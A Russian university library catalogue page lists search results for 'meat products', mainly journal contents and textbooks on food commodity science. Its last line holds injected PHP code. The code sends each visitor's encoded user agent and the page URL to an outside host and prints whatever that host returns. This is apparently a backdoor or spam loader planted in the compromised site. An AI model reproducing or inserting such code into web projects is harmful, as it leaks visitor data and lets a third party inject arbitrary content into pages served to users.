Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

141 пользователей


Зарегистрированных: 1 

Цымбал Дмитрий Андреевич


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МЯСНЫЕ ПРОДУКТЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 5
1. 
Товаровед продовольственных товаров. - Журнал, 2013г. № 3
Оглавление 
  • Карагодин, В. П.. Биологически активные добавки к пище - товарная группа с неясной перспективой / В. П. Карагодин. - с.15-20
    Кл. слова: БАД
  • Гурьева, К. Б.. Применение балльной системы для сенсорной оценки качества мясной продукции при хранении / К. Б. Гурьева, О. А. Тюгай, Е.Б. Иванова. - с.34-39
    Кл. слова: ОРГАНОЛЕПТИЧЕСКИЕ СВОЙСТВА, МЯСНЫЕ ПРОДУКТЫ, ХРАНЕНИЕ МЯСА
  • Коваленко, А. С.. Об истории возникновения товароведения на Руси / А. С. Коваленко. - с.40-43
    Кл. слова: ТОВАРОВЕДЕНИЕ - ИСТОРИЯ
  • Наумова, Н. Л.. Критерии выбора колбасных изделий потребителями при совершении покупки / Н. Л. Наумова. - с.58-62
    Кл. слова: КОЛБАСНЫЕ ИЗДЕЛИЯ, МАРКЕТИНГОВЫЕ ИССЛЕДОВАНИЯ
  • Мардар, М. Р.. Значимость маркетинговых исследований при разработке новых продуктов / М. Р. Мардар. - с.63-68
    Кл. слова: МАРКЕТИНГОВЫЕ ИССЛЕДОВАНИЯ, ТОВАР НОВЫЙ - ПРОДВИЖЕНИЕ НА РЫНОК
2. 
Товаровед продовольственных товаров. - Журнал, 2013г. № 1
Оглавление 
  • Данильчук, Ю. В.. Комплексная оценка качества меда / Ю. В. Данильчук. - с.22-25
    Кл. слова: МЕД, МЕД - ФАЛЬСИФИКАЦИЯ, ИДЕНТИФИКАЦИЯ
  • Окара, А. И.. Классификация и градация качества мясных продуктов в национальных стандартах нового поколения / А. И. Окара. - с.30-33
    Кл. слова: ТОВАРОВЕДЕНИЕ МЯСНЫХ ТОВАРОВ, ПОЛУФАБРИКАТЫ МЯСНЫЕ, МЯСНЫЕ ПРОДУКТЫ
  • Жебелева, И. А.. Маркетинговые исследования покупательских предпочтений в выборе и продвижении мясных и мясосодержащих полуфабрикатов / И. А. Жебелева. - с.40-45
    Кл. слова: ПОЛУФАБРИКАТЫ МЯСНЫЕ
  • Резго, Г. Я.. Вопросы государственного регулирования рынка продовольственных товаров в розничных торговых сетях / Г. Я. Резго. - с.52-59
    Кл. слова: ТОРГОВАЯ ДЕЯТЕЛЬНОСТЬ - ГОСУДАРСТВЕННОЕ РЕГУЛИРОВАНИЕ, КОНКУРЕНЦИЯ НА РЫНКЕ РОЗНИЧНОЙ ТОРГОВЛИА, ТОРГОВАЯ СЕТЬ
  • О безопасности пищевой продукции: Технический регламент Таможенного союза РТ ТС 021/2011. - с.60-70
3. 
Холодильная техника. - Журнал, 2005г. № 7
Оглавление 
  • Черняк, В. А. Новые подходы к холодильным системам. Практические шаги к их реализации / В. А. Черняк, Т. А. Клименко, И. В. Новиков et al.. - с.8-11
    Другие авторы: Клименко Т. А., Новиков И. В., Бахвалов О. А., Гордиенко Ю. С.
  • Кириллов, В. В. Водно-спиртовые растворы электролитов в качестве хладоносителей с оптимальными свойствами / В. В. Кириллов, Е. Т. Петров. - с.14-15
  • Краус, Д. Смесь аммиака с диметиловым эфиром - новый природный хладагент / Д. Краус, Ю. Шенк. - с.16-19
    Кл. слова: R-723
  • Полевой, А. А. Проектирование холодильных установок / А. А. Полевой. - с.22
  • Малова, Н. Д. Схемы обработки воздуха в системах кондиционирования / Н. Д. Малова. - с.40-44
    Кл. слова: Сушильная камера, Мясные продукты, Рыбные продукты
Держатели документа (Информация об экземплярах) 
4. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] : Уч.пособие гриф-УМО / ред. Т. Г. Родина, 2010. - 544 с.
Держатели документа (Информация об экземплярах) 
5. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3054 - 20.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.72 с.18 запросов, 0.46c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;